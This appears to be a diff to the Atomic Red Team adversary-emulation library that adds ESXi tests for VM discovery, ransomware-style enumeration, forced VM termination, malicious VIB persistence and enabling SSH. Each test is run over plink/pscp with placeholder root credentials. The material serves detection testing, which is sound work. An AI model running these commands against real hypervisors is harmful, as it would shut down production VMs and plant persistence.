+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to file containing darkside ransomware discovery commands
+          type: path
+          default: PathToAtomicsFolder\T1082\src\esx_darkside_discovery.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1016.002:
     technique:
       modified: '2023-10-05T11:35:30.887Z'
@@ -57932,6 +58194,52 @@ discovery:
           find . -type f -name ".*"
         cleanup_command: 'rm #{output_file}'
         name: sh
+    - name: ESXi - Enumerate VMDKs available on an ESXi Host
+      auto_generated_guid: 4a233a40-caf7-4cf1-890a-c6331bbc72cf
+      description: |
+        An adversary uses the find command to enumerate vmdks on an ESXi host.
+        [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to script with file discovery commands
+          type: path
+          default: PathToAtomicsFolder\T1083\src\esxi_file_discovery.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1049:
     technique:
       modified: '2022-09-06T22:35:34.231Z'
@@ -66906,6 +67214,98 @@ impact:
           '
         name: bash
         elevation_required: true
+    - name: ESXi - Terminates VMs using pkill
+      auto_generated_guid: 987c9b4d-a637-42db-b1cb-e9e242c3991b
+      description: |
+        In VMWARE ESXi, process names starting with vmx are associated with running VMs. An adversary can use the pkill command to kill all processes with a prefix vmx.
+        [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to text with commands
+          type: path
+          default: PathToAtomicsFolder\T1529\src\esx_pkill.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
+    - name: ESXi - Avoslocker enumerates VMs and forcefully kills VMs
+      auto_generated_guid: 189f7d6e-9442-4160-9bc3-5e4104d93ece
+      description: |
+        Avoslocker malware has inbuilt functionality to enumerate the VM instances and uses the esxcli command to forcefully power off them.
+        [Reference](https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to text with commands
+          type: path
+          default: PathToAtomicsFolder\T1529\src\esx_avoslocker_kill_vm.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
 initial-access:
   T1133:
     technique:

atomics/Indexes/macos-index.yaml

@@ -8743,7 +8743,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -8829,6 +8829,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -25873,7 +25874,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -25944,6 +25945,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -43674,7 +43676,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -43720,6 +43722,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/office-365-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -23041,7 +23042,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -23112,6 +23113,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39283,7 +39285,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39329,6 +39331,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/saas-index.yaml

@@ -7293,7 +7293,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -7379,6 +7379,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -22860,7 +22861,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -22931,6 +22932,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -39003,7 +39005,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -39049,6 +39051,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/Indexes/windows-index.yaml

@@ -13582,7 +13582,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -13668,6 +13668,7 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
@@ -39222,7 +39223,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -39293,7 +39294,70 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1129
+    atomic_tests:
+    - name: ESXi - Install a custom VIB on an ESXi host
+      auto_generated_guid: 7f843046-abf2-443f-b880-07a83cf968ec
+      description: |
+        An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs).
+        [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        pscp_file:
+          description: Path to Pscp
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\pscp.exe
+        vib_install:
+          description: Path to script with commands to install the vib
+          type: path
+          default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibinstall.txt
+        vib_remove:
+          description: Path to script with commands to remove the vib
+          type: path
+          default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibremove.txt
+        vib_file:
+          description: Path to the dummy vib
+          type: path
+          default: PathToAtomicsFolder\..\atomics\T1129\src\atomicvibes.vib
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink and pscp are available.
+
+          '
+        prereq_command: |
+          if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+          if (Test-Path "#{pscp_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\plink.exe"
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+      executor:
+        command: |
+          #{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
+          echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
+        cleanup_command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}"
+          -pw "#{vm_pass}" -m "#{vib_remove}"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1059.007:
     technique:
       x_mitre_platforms:
@@ -63873,7 +63937,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -63919,6 +63983,7 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1021.004
     atomic_tests: []
   T1091:
     technique:

atomics/T1021.004/T1021.004.md

@@ -0,0 +1,67 @@
+# T1021.004 - Remote Services: SSH
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/004)
+<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
+
+SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - ESXi - Enable SSH via PowerCLI](#atomic-test-1---esxi---enable-ssh-via-powercli)
+
+
+<br/>
+
+## Atomic Test #1 - ESXi - Enable SSH via PowerCLI
+An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
+Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
+Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
+```
+
+#### Cleanup Commands:
+```powershell
+Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
+Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
+Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+if (-not $RequiredModule) {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name VMware.PowerCLI
+```
+
+
+
+
+<br/>

atomics/T1082/T1082.md

@@ -70,6 +70,10 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
 
 - [Atomic Test #31 - BIOS Information Discovery through Registry](#atomic-test-31---bios-information-discovery-through-registry)
 
+- [Atomic Test #32 - ESXi - VM Discovery using ESXCLI](#atomic-test-32---esxi---vm-discovery-using-esxcli)
+
+- [Atomic Test #33 - ESXi - Darkside system information discovery](#atomic-test-33---esxi---darkside-system-information-discovery)
+
 
 <br/>
 
@@ -1089,4 +1093,106 @@ reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #32 - ESXi - VM Discovery using ESXCLI
+An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine.
+[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 2040405c-eea6-4c1c-aef3-c2acc430fac9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| cli_script | Path to file with discovery commands | path | PathToAtomicsFolder&#92;T1082&#92;src&#92;esx_vmdiscovery.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #33 - ESXi - Darkside system information discovery
+Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
+[Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** f89812e5-67d1-4f49-86fa-cbc6609ea86a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| cli_script | Path to file containing darkside ransomware discovery commands | path | PathToAtomicsFolder&#92;T1082&#92;src&#92;esx_darkside_discovery.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>

atomics/T1083/T1083.md

@@ -18,6 +18,8 @@ Many command shell utilities can be used to obtain this information. Examples in
 
 - [Atomic Test #6 - Launch DirLister Executable](#atomic-test-6---launch-dirlister-executable)
 
+- [Atomic Test #7 - ESXi - Enumerate VMDKs available on an ESXi Host](#atomic-test-7---esxi---enumerate-vmdks-available-on-an-esxi-host)
+
 
 <br/>
 
@@ -285,4 +287,55 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip","P
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - ESXi - Enumerate VMDKs available on an ESXi Host
+An adversary uses the find command to enumerate vmdks on an ESXi host.
+[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 4a233a40-caf7-4cf1-890a-c6331bbc72cf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| cli_script | Path to script with file discovery commands | path | PathToAtomicsFolder&#92;T1083&#92;src&#92;esxi_file_discovery.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>

atomics/T1129/T1129.md

@@ -0,0 +1,76 @@
+# T1129 - Server Software Component
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1129)
+<blockquote>Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
+
+Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.
+
+The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)
+
+The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - ESXi - Install a custom VIB on an ESXi host](#atomic-test-1---esxi---install-a-custom-vib-on-an-esxi-host)
+
+
+<br/>
+
+## Atomic Test #1 - ESXi - Install a custom VIB on an ESXi host
+An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs).
+[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7f843046-abf2-443f-b880-07a83cf968ec
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| vm_user | Specify the privilege user account on ESXi Server | string | root|
+| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
+| plink_file | Path to plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| pscp_file | Path to Pscp | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pscp.exe|
+| vib_install | Path to script with commands to install the vib | path | PathToAtomicsFolder&#92;..&#92;atomics&#92;T1129&#92;src&#92;esxi_vibinstall.txt|
+| vib_remove | Path to script with commands to remove the vib | path | PathToAtomicsFolder&#92;..&#92;atomics&#92;T1129&#92;src&#92;esxi_vibremove.txt|
+| vib_file | Path to the dummy vib | path | PathToAtomicsFolder&#92;..&#92;atomics&#92;T1129&#92;src&#92;atomicvibes.vib|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
+```
+
+#### Cleanup Commands:
+```cmd
+echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_remove}"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink and pscp are available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+if (Test-Path "#{pscp_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\plink.exe"
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+```
+
+
+
+
+<br/>

atomics/T1529/T1529.md

@@ -32,6 +32,10 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
 
 - [Atomic Test #12 - Logoff System - Windows](#atomic-test-12---logoff-system---windows)
 
+- [Atomic Test #13 - ESXi - Terminates VMs using pkill](#atomic-test-13---esxi---terminates-vms-using-pkill)
+
+- [Atomic Test #14 - ESXi - Avoslocker enumerates VMs and forcefully kills VMs](#atomic-test-14---esxi---avoslocker-enumerates-vms-and-forcefully-kills-vms)
+
 
 <br/>
 
@@ -388,4 +392,106 @@ shutdown /l
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - ESXi - Terminates VMs using pkill
+In VMWARE ESXi, process names starting with vmx are associated with running VMs. An adversary can use the pkill command to kill all processes with a prefix vmx.
+[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+
